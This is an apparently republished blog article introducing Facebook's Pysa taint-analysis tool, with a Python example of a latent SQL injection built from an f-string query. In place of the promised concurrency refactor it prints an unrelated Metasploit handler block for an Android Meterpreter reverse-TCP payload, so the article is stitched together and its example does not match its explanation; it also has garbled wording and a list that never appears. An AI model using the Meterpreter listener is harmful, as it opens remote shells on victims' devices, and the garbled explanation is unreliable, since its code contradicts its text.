“Pysa” is an open-source static analysis tool built by Facebook. It has been built to detect and prevent security and privacy issues in python code. Pysa is an acronym for Python Static Analyzer.
Pysa is a security-focused tool build on the top of Pyre, Facebook's type checker for python. It checks code and analyzes how data flows through it. Data flow analysis is useful because many security and privacy issues can be modeled as data flowing into a place it shouldn’t. It helps to detect a wide range of issues.
Example: When Facebook use on their python code makes use of certain internal frameworks, which is designed to prevent access or disclose on their user data based on technical privacy policies.
Pysa detects common web app security issues like SQL injection, XSS. It helps to scale application security efforts for python which is the most important codebase which powers Instagram’s servers.
Pysa was developed with the lessons learned from Zoncolan in mind. It used the same algorithm to perform analysis and even shares some code with Zoncolan. It tracks data flows through a program. The most common kinds of sources are places where user-controlled data enters the application like Django’s HttpRequest.GET dictionary. Sinks tend to be much more varied but can include APIs that execute code suck as eval to access file systems like os.open. It performs some rounds of analysis to build summaries to determine which functions have parameters that eventually reach a sink. Visualizing this process creates a tree with the issue of apex and source and sinks at the leaves.
According to Facebook engineers, it gives some false positive and negative and they decide how to deal with it.
Here are two kinds of functionality by which users can remove these false positives and negative features:
Where Pysa is most Useful?
Imagine this code is written by a user.
# views/user.py
async def get_profile(request: HttpRequest) -> HttpResponse:
profile = load_profile(request.GET['user_id'])
...
# controller/user.py
async def load_profile(user_id: str):
user = load_user(user_id) # Loads a user safely; no SQL injection
pictures = load_pictures(user.id)
...
# model/media.py
async def load_pictures(user_id: str):
query = f"""
SELECT *
FROM pictures
WHERE user_id = {user_id}
"""
result = run_query(query)
...
# model/shared.py
async def run_query(query: str):
connection = create_sql_connection()
result = await connection.execute(query)
...
The potential SQL injection is load_pictures is not exploitable because that function will only ever receive the valid user_id that resulted from calling load_user in the load_profile function.
Then, imagine that an engineer fetching the user and picture data concurrently results faster —
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.126
set lport 4444
exploit
This change may look innocuous but ends up connecting the user-controlled user_id string directly to the SQL injection issue in load_pictures. In a large application with many layers between the entry point and database queries, this engineer might never realize that the data is fully user-controlled, or that a SQL injection issue lurks in one of the functions called.
Open-source Pysa:
Facebook makes Pysa open source to help it to find security issues. So others can use these tools for their python code. Some open-source Python frameworks such as Django and Tornedo, Pysa helps to find security issues in projects in the first run and also in record time.
Limitation —
There is no way to build a perfect static analyzer. Pysa has also some limitations based on its choice to detect security issues by data flow, together with design decisions that trade-off performance for precision and accuracy.
Previously published behind a paywall: https://centocode.com/pysa-to-detect-and-prevent-security-issues-in-python-code-1437/